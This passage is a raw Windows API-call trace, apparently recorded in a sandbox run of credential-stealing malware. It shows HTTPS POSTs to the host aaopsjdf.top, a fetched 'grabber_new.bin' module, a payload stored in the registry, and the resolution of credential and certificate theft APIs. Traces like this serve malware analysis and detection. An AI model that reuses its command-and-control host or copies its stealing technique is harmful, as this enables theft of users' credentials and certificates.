lpszHeaders="Connection: close\r\n\x9fеA", dwHeadersLength=0x13, lpOptional=0x40cf68, dwOptionalLength=0x300) returned 0 [0460.117] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x52ef34, lpdwBufferLength=0x52ef38 | out: lpBuffer=0x52ef34, lpdwBufferLength=0x52ef38) returned 1 [0460.117] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x52ef34, dwBufferLength=0x4) returned 1 [0460.117] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x9fеA", dwHeadersLength=0x13, lpOptional=0x40cf68*, dwOptionalLength=0x300 | out: lpOptional=0x40cf68*) returned 1 [0460.584] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x52ef34, lpdwBufferLength=0x52ef38, lpdwIndex=0x0 | out: lpBuffer=0x52ef34*, lpdwBufferLength=0x52ef38*=0x4, lpdwIndex=0x0) returned 1 [0460.584] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0460.585] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x41b5d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x52f048 | out: lpBuffer=0x41b5d0*, lpdwNumberOfBytesRead=0x52f048*=0xc0) returned 1 [0460.586] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0460.587] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x41b690, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x52f048 | out: lpBuffer=0x41b690*, lpdwNumberOfBytesRead=0x52f048*=0x0) returned 1 [0460.588] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0460.591] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x52f044, lpdwBufferLength=0x52f040 | out: lpBuffer=0x52f044, lpdwBufferLength=0x52f040) returned 1 [0460.591] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0460.591] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0460.591] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52eb1c | out: phkResult=0x52eb1c*=0x3bc) returned 0x0 [0460.592] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52eb48, lpData=0x0, lpcbData=0x52eb30*=0x0 | out: lpType=0x52eb48*=0x3, lpData=0x0, lpcbData=0x52eb30*=0x6f0) returned 0x0 [0460.592] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52eb48, lpData=0x4124b8, lpcbData=0x52eb30*=0x6f0 | out: lpType=0x52eb48*=0x3, lpData=0x4124b8*, lpcbData=0x52eb30*=0x6f0) returned 0x0 [0460.592] RegCloseKey (hKey=0x3bc) returned 0x0 [0460.593] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52f49c | out: phkResult=0x52f49c*=0x3bc) returned 0x0 [0460.593] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f4c8, lpData=0x0, lpcbData=0x52f4b0*=0x0 | out: lpType=0x52f4c8*=0x3, lpData=0x0, lpcbData=0x52f4b0*=0x6f0) returned 0x0 [0460.593] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f4c8, lpData=0x4124b8, lpcbData=0x52f4b0*=0x6f0 | out: lpType=0x52f4c8*=0x3, lpData=0x4124b8*, lpcbData=0x52f4b0*=0x6f0) returned 0x0 [0460.593] RegCloseKey (hKey=0x3bc) returned 0x0 [0460.594] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/grabber_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52f4b0 | out: lpUrlComponents=0x52f4b0) returned 1 [0460.594] GetSystemTime (in: lpSystemTime=0x52f160 | out: lpSystemTime=0x52f160*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x3b, wSecond=0xb, wMilliseconds=0x181)) [0460.594] SystemTimeToFileTime (in: lpSystemTime=0x52f160, lpFileTime=0x52f170 | out: lpFileTime=0x52f170) returned 1 [0460.594] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x52f1e8, nSize=0x52f194 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x52f194) returned 0x1 [0460.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0460.596] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52f0e4 | out: phkResult=0x52f0e4*=0x5a4) returned 0x0 [0460.596] RegQueryValueExW (in: hKey=0x5a4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f110, lpData=0x0, lpcbData=0x52f0f8*=0x0 | out: lpType=0x52f110*=0x3, lpData=0x0, lpcbData=0x52f0f8*=0x6f0) returned 0x0 [0460.596] RegQueryValueExW (in: hKey=0x5a4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f110, lpData=0x4124b8, lpcbData=0x52f0f8*=0x6f0 | out: lpType=0x52f110*=0x3, lpData=0x4124b8*, lpcbData=0x52f0f8*=0x6f0) returned 0x0 [0460.597] RegCloseKey (hKey=0x5a4) returned 0x0 [0460.597] wvnsprintfW (in: pszDest=0x52f19c, cchDest=10, pszFmt="%u.%u.%u", arglist=0x52f174 | out: pszDest="2.6.1") returned 5 [0460.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0460.598] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x52f356, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x52f0b8, pcbStructInfo=0x52f09c | out: pvStructInfo=0x52f0b8, pcbStructInfo=0x52f09c) returned 1 [0460.598] CryptImportPublicKeyInfo (in: hCryptProv=0x55e630, dwCertEncodingType=0x1, pInfo=0x5bfaa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x5bfad0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x5bfad8*, PublicKey.cUnusedBits=0x0), phKey=0x52f0a8 | out: phKey=0x52f0a8*=0x57d1e0) returned 1 [0460.598] LocalFree (hMem=0x5bfaa0) returned 0x0 [0460.598] wvnsprintfA (in: pszDest=0x3dc038, cchDest=21, pszFmt="%d", arglist=0x52efbc | out: pszDest="1515610751") returned 10 [0460.598] CryptEncrypt (in: hKey=0x57d1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x52ef08*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x52ef08*=0x100) returned 1 [0460.599] CryptEncrypt (in: hKey=0x57d1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4104b8*, pdwDataLen=0x52ef1c*=0x20, dwBufLen=0x100 | out: pbData=0x4104b8*, pdwDataLen=0x52ef1c*=0x100) returned 1 [0460.599] CryptDestroyKey (hKey=0x57d1e0) returned 1 [0460.599] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/grabber_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52f018 | out: lpUrlComponents=0x52f018) returned 1 [0460.600] wvnsprintfA (in: pszDest=0x40f218, cchDest=516, pszFmt="%s%s", arglist=0x52f050 | out: pszDest="https://aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/") returned 61 [0460.600] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52f010 | out: lpUrlComponents=0x52f010) returned 1 [0460.600] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0460.600] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0460.600] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0460.600] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0460.600] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0460.601] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0460.601] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Connection: close\r\n", dwHeadersLength=0x13, lpOptional=0x40e6a0, dwOptionalLength=0x300) returned 0 [0460.815] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x52ef34, lpdwBufferLength=0x52ef38 | out: lpBuffer=0x52ef34, lpdwBufferLength=0x52ef38) returned 1 [0460.815] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x52ef34, dwBufferLength=0x4) returned 1 [0460.815] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\n", dwHeadersLength=0x13, lpOptional=0x40e6a0*, dwOptionalLength=0x300 | out: lpOptional=0x40e6a0*) returned 1 [0461.274] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x52ef34, lpdwBufferLength=0x52ef38, lpdwIndex=0x0 | out: lpBuffer=0x52ef34*, lpdwBufferLength=0x52ef38*=0x4, lpdwIndex=0x0) returned 1 [0461.274] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0461.275] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x41b5d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x52f048 | out: lpBuffer=0x41b5d0*, lpdwNumberOfBytesRead=0x52f048*=0xc0) returned 1 [0461.277] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0461.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x41b690, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x52f048 | out: lpBuffer=0x41b690*, lpdwNumberOfBytesRead=0x52f048*=0x0) returned 1 [0461.278] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0461.281] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x52f044, lpdwBufferLength=0x52f040 | out: lpBuffer=0x52f044, lpdwBufferLength=0x52f040) returned 1 [0461.281] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0461.281] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0461.281] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52eb40 | out: phkResult=0x52eb40*=0x5a4) returned 0x0 [0461.282] RegQueryValueExW (in: hKey=0x5a4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52eb6c, lpData=0x0, lpcbData=0x52eb54*=0x0 | out: lpType=0x52eb6c*=0x3, lpData=0x0, lpcbData=0x52eb54*=0x6f0) returned 0x0 [0461.282] RegQueryValueExW (in: hKey=0x5a4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52eb6c, lpData=0x4124b8, lpcbData=0x52eb54*=0x6f0 | out: lpType=0x52eb6c*=0x3, lpData=0x4124b8*, lpcbData=0x52eb54*=0x6f0) returned 0x0 [0461.282] RegCloseKey (hKey=0x5a4) returned 0x0 [0461.283] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52ee1c | out: phkResult=0x52ee1c*=0x5a4) returned 0x0 [0461.283] RegQueryValueExW (in: hKey=0x5a4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52ee48, lpData=0x0, lpcbData=0x52ee30*=0x0 | out: lpType=0x52ee48*=0x3, lpData=0x0, lpcbData=0x52ee30*=0x6f0) returned 0x0 [0461.283] RegQueryValueExW (in: hKey=0x5a4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52ee48, lpData=0x4124b8, lpcbData=0x52ee30*=0x6f0 | out: lpType=0x52ee48*=0x3, lpData=0x4124b8*, lpcbData=0x52ee30*=0x6f0) returned 0x0 [0461.283] RegCloseKey (hKey=0x5a4) returned 0x0 [0581.295] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="D3") returned 2 [0581.295] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="F6") returned 2 [0581.295] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="CA") returned 2 [0581.295] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="B6") returned 2 [0581.295] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="1E") returned 2 [0581.295] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="96") returned 2 [0581.295] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="B0") returned 2 [0581.295] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="29") returned 2 [0581.295] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="AD") returned 2 [0581.295] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="17") returned 2 [0581.296] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="0E") returned 2 [0581.296] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="EF") returned 2 [0581.296] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="2C") returned 2 [0581.296] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="2F") returned 2 [0581.296] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="89") returned 2 [0581.296] wvnsprintfW (in: pszDest=0x52e4e8, cchDest=3, pszFmt="%02X", arglist=0x52e4c4 | out: pszDest="C2") returned 2 [0581.296] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="D3F6CAB61E96B029AD170EEF2C2F89C2") returned 0x298 [0581.296] WaitForSingleObject (hHandle=0x298, dwMilliseconds=0xffffffff) returned 0x0 [0581.297] PathCombineW (in: pszDest=0x89998, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0581.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x52e42e, cbMultiByte=4, lpWideCharStr=0x89a00, cchWideChar=10 | out: lpWideCharStr="Etegci") returned 4 [0581.297] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52e438 | out: phkResult=0x52e438*=0x29c) returned 0x0 [0581.297] RegQueryValueExW (in: hKey=0x29c, lpValueName="Eteg", lpReserved=0x0, lpType=0x52e768, lpData=0x0, lpcbData=0x52e44c*=0x0 | out: lpType=0x52e768*=0x3, lpData=0x0, lpcbData=0x52e44c*=0x480b0) returned 0x0 [0581.300] RegQueryValueExW (in: hKey=0x29c, lpValueName="Eteg", lpReserved=0x0, lpType=0x52e768, lpData=0x3410048, lpcbData=0x52e44c*=0x480b0 | out: lpType=0x52e768*=0x3, lpData=0x3410048*, lpcbData=0x52e44c*=0x480b0) returned 0x0 [0581.301] RegCloseKey (hKey=0x29c) returned 0x0 [0581.311] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0581.311] GetProcAddress (hModule=0x759c0000, lpProcName="CloseHandle") returned 0x759d1410 [0581.311] GetProcAddress (hModule=0x759c0000, lpProcName="GetSystemTime") returned 0x759d5a96 [0581.312] GetProcAddress (hModule=0x759c0000, lpProcName="FileTimeToLocalFileTime") returned 0x759de29e [0581.312] GetProcAddress (hModule=0x759c0000, lpProcName="FileTimeToDosDateTime") returned 0x759ec86d [0581.312] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryA") returned 0x759d49d7 [0581.312] GetProcAddress (hModule=0x759c0000, lpProcName="ExpandEnvironmentStringsW") returned 0x759d4173 [0581.312] GetProcAddress (hModule=0x759c0000, lpProcName="GetTempPathW") returned 0x759ed4dc [0581.312] GetProcAddress (hModule=0x759c0000, lpProcName="GetTempFileNameW") returned 0x759fd1b6 [0581.312] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveDirectoryW") returned 0x75a544cf [0581.313] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileW") returned 0x759d3f5c [0581.313] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileAttributesW") returned 0x759ed4f7 [0581.313] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileAttributesW") returned 0x759d1b18 [0581.313] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteFileW") returned 0x759d89b3 [0581.313] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstFileW") returned 0x759d4435 [0581.313] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextFileW") returned 0x759d54ee [0581.313] GetProcAddress (hModule=0x759c0000, lpProcName="MultiByteToWideChar") returned 0x759d192e [0581.314] GetProcAddress (hModule=0x759c0000, lpProcName="WideCharToMultiByte") returned 0x759d170d [0581.314] GetProcAddress (hModule=0x759c0000, lpProcName="GlobalUnlock") returned 0x759ecfdf [0581.314] GetProcAddress (hModule=0x759c0000, lpProcName="LocalAlloc") returned 0x759d168c [0581.314] GetProcAddress (hModule=0x759c0000, lpProcName="LocalFree") returned 0x759d2d3c [0581.314] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSize") returned 0x759d196e [0581.314] GetProcAddress (hModule=0x759c0000, lpProcName="MapViewOfFile") returned 0x759d18f1 [0581.314] GetProcAddress (hModule=0x759c0000, lpProcName="UnmapViewOfFile") returned 0x759d1826 [0581.315] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpA") returned 0x759eeceb [0581.315] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiA") returned 0x759d3e8e [0581.315] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiW") returned 0x759ed5cd [0581.315] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcpynA") returned 0x759e192a [0581.315] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcpynW") returned 0x759fd556 [0581.315] GetProcAddress (hModule=0x759c0000, lpProcName="lstrlenA") returned 0x759d5a4b [0581.315] GetProcAddress (hModule=0x759c0000, lpProcName="lstrlenW") returned 0x759d1700 [0581.316] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileMappingW") returned 0x759d1909 [0581.316] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryW") returned 0x759d492b [0581.316] GetProcAddress (hModule=0x759c0000, lpProcName="GetPrivateProfileIntW") returned 0x759f298b [0581.316] GetProcAddress (hModule=0x759c0000, lpProcName="GetPrivateProfileStringW") returned 0x759dea48 [0581.316] GetProcAddress (hModule=0x759c0000, lpProcName="GetPrivateProfileSectionNamesW") returned 0x75a4a1ea [0581.316] GetProcAddress (hModule=0x759c0000, lpProcName="GetWindowsDirectoryW") returned 0x759d43e2 [0581.316] GetProcAddress (hModule=0x759c0000, lpProcName="SetDllDirectoryW") returned 0x75a5004f [0581.317] GetProcAddress (hModule=0x759c0000, lpProcName="GetVersionExW") returned 0x759d1ae5 [0581.317] GetProcAddress (hModule=0x759c0000, lpProcName="FindClose") returned 0x759d4442 [0581.317] GetProcAddress (hModule=0x759c0000, lpProcName="SetFilePointerEx") returned 0x759ec807 [0581.317] GetProcAddress (hModule=0x759c0000, lpProcName="DisableThreadLibraryCalls") returned 0x759d48e5 [0581.317] GetProcAddress (hModule=0x759c0000, lpProcName="ReadFile") returned 0x759d3ed3 [0581.317] GetProcAddress (hModule=0x759c0000, lpProcName="WriteFile") returned 0x759d1282 [0581.317] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSizeEx") returned 0x759d59e2 [0581.318] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileInformationByHandle") returned 0x759d53ae [0581.318] GetProcAddress (hModule=0x759c0000, lpProcName="Sleep") returned 0x759d10ff [0581.318] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForSingleObject") returned 0x759d1136 [0581.318] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcessHeap") returned 0x759d14e9 [0581.318] GetProcAddress (hModule=0x759c0000, lpProcName="HeapFree") returned 0x759d14c9 [0581.318] GetProcAddress (hModule=0x759c0000, lpProcName="HeapReAlloc") returned 0x77cf1f6e [0581.318] GetProcAddress (hModule=0x759c0000, lpProcName="HeapAlloc") returned 0x77cde026 [0581.319] GetProcAddress (hModule=0x759c0000, lpProcName="HeapDestroy") returned 0x759d35b7 [0581.319] GetProcAddress (hModule=0x759c0000, lpProcName="HeapCreate") returned 0x759d4a2d [0581.319] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFree") returned 0x759d186e [0581.319] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAlloc") returned 0x759d1856 [0581.319] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcAddress") returned 0x759d1222 [0581.319] GetProcAddress (hModule=0x759c0000, lpProcName="GlobalLock") returned 0x759ed0a7 [0581.320] GetProcAddress (hModule=0x759c0000, lpProcName="FreeLibrary") returned 0x759d34c8 [0581.320] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0581.320] GetProcAddress (hModule=0x758c0000, lpProcName="CharLowerW") returned 0x758d7647 [0581.320] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0581.320] GetProcAddress (hModule=0x77740000, lpProcName="CredFree") returned 0x7774b2ec [0581.320] GetProcAddress (hModule=0x77740000, lpProcName="RegEnumKeyExW") returned 0x777546c8 [0581.320] GetProcAddress (hModule=0x77740000, lpProcName="RegEnumValueW") returned 0x777548cc [0581.321] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyHash") returned 0x7774df66 [0581.321] GetProcAddress (hModule=0x77740000, lpProcName="CryptHashData") returned 0x7774df36 [0581.321] GetProcAddress (hModule=0x77740000, lpProcName="CryptCreateHash") returned 0x7774df4e [0581.321] GetProcAddress (hModule=0x77740000, lpProcName="CryptGetHashParam") returned 0x7774df7e [0581.321] GetProcAddress (hModule=0x77740000, lpProcName="CryptReleaseContext") returned 0x7774e124 [0581.321] GetProcAddress (hModule=0x77740000, lpProcName="CryptAcquireContextW") returned 0x7774df14 [0581.321] GetProcAddress (hModule=0x77740000, lpProcName="RegCloseKey") returned 0x7775469d [0581.322] GetProcAddress (hModule=0x77740000, lpProcName="CredEnumerateW") returned 0x77787481 [0581.322] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryValueExW") returned 0x777546ad [0581.322] GetProcAddress (hModule=0x77740000, lpProcName="RegOpenKeyExW") returned 0x7775468d [0581.322] GetProcAddress (hModule=0x77740000, lpProcName="RegOpenKeyW") returned 0x77752459 [0581.322] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0581.322] GetProcAddress (hModule=0x76a70000, lpProcName="SHGetFolderPathW") returned 0x76af5708 [0581.322] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0581.323] GetProcAddress (hModule=0x75ae0000, lpProcName="OleInitialize") returned 0x75afefd7 [0581.323] GetProcAddress (hModule=0x75ae0000, lpProcName="CoTaskMemFree") returned 0x75b36f41 [0581.323] GetProcAddress (hModule=0x75ae0000, lpProcName="OleUninitialize") returned 0x75afeba1 [0581.323] GetProcAddress (hModule=0x75ae0000, lpProcName="CreateStreamOnHGlobal") returned 0x75b0363b [0581.323] GetProcAddress (hModule=0x75ae0000, lpProcName="CoCreateInstance") returned 0x75b29d0b [0581.323] GetProcAddress (hModule=0x75ae0000, lpProcName="GetHGlobalFromStream") returned 0x75b041d5 [0581.323] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0581.324] GetProcAddress (hModule=0x76370000, lpProcName="StrStrIA") returned 0x7637d250 [0581.324] GetProcAddress (hModule=0x76370000, lpProcName="StrStrIW") returned 0x763846e9 [0581.324] GetProcAddress (hModule=0x76370000, lpProcName="StrCmpNIA") returned 0x7637d11c [0581.324] GetProcAddress (hModule=0x76370000, lpProcName="PathMatchSpecW") returned 0x763886f7 [0581.324] GetProcAddress (hModule=0x76370000, lpProcName="PathFindFileNameW") returned 0x7638bb71 [0581.324] GetProcAddress (hModule=0x76370000, lpProcName="PathCombineW") returned 0x7638c39c [0581.324] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfW") returned 0x763b066c [0581.325] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfA") returned 0x7639edfe [0581.325] GetProcAddress (hModule=0x76370000, lpProcName="StrRChrIW") returned 0x763ae782 [0581.325] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76240000 [0581.325] GetProcAddress (hModule=0x76240000, lpProcName="CertOpenSystemStoreW") returned 0x7627c8d1 [0581.325] GetProcAddress (hModule=0x76240000, lpProcName="CertCloseStore") returned 0x7624dd10 [0581.325] GetProcAddress (hModule=0x76240000, lpProcName="CryptUnprotectData") returned 0x76275a7f [0581.325] GetProcAddress (hModule=0x76240000, lpProcName="PFXExportCertStoreEx") returned 0x762d1061 [0581.326] GetProcAddress (hModule=0x76240000, lpProcName="CertEnumCertificatesInStore") returned 0x7624e33a [0581.326] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x75690000 [0581.326] GetProcAddress (hModule=0x75690000, lpProcName="GetUserNameExW") returned 0x7582a415 [0581.326] LoadLibraryA (lpLibFileName="MSVCRT.dll") returned 0x75e70000 [0581.326] GetProcAddress (hModule=0x75e70000, lpProcName="memcpy") returned 0x75e79910 [0581.326] GetProcAddress (hModule=0x75e70000, lpProcName="_adjust_fdiv") returned 0x75f132ec [0581.327] GetProcAddress (hModule=0x75e70000, lpProcName="strchr") returned 0x75e7dbeb [0581.327] GetProcAddress (hModule=0x75e70000, lpProcName="memmove") returned 0x75e79e5a [0581.327] GetProcAddress (hModule=0x75e70000, lpProcName="malloc") returned 0x75e79cee [0581.327] GetProcAddress (hModule=0x75e70000, lpProcName="atoi") returned 0x75e7dbe0 [0581.327] GetProcAddress (hModule=0x75e70000, lpProcName="_vsnwprintf") returned 0x75e7bbce [0581.327] GetProcAddress (hModule=0x75e70000, lpProcName="_vsnprintf") returned 0x75e7d1a8 [0581.327] GetProcAddress (hModule=0x75e70000, lpProcName="memset") returned 0x75e79790 [0581.328] GetProcAddress (hModule=0x75e70000, lpProcName="_initterm") returned 0x75e7c151 [0581.328] GetProcAddress (hModule=0x75e70000, lpProcName="free") returned 0x75e79894 [0581.328] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0581.328] GetProcAddress (hModule=0x75f20000, lpProcName="FindFirstUrlCacheEntryW") returned 0x75f5978a [0581.328] GetProcAddress (hModule=0x75f20000, lpProcName="DeleteUrlCacheEntryW") returned 0x75f79573 [0581.328] GetProcAddress (hModule=0x75f20000, lpProcName="FindCloseUrlCache") returned 0x75f68409 [0581.328] GetProcAddress (hModule=0x75f20000, lpProcName="FindNextUrlCacheEntryW") returned 0x75f5989c [0581.328] DisableThreadLibraryCalls (hLibModule=0x370000) returned 0 [0581.328] CreateMutexW 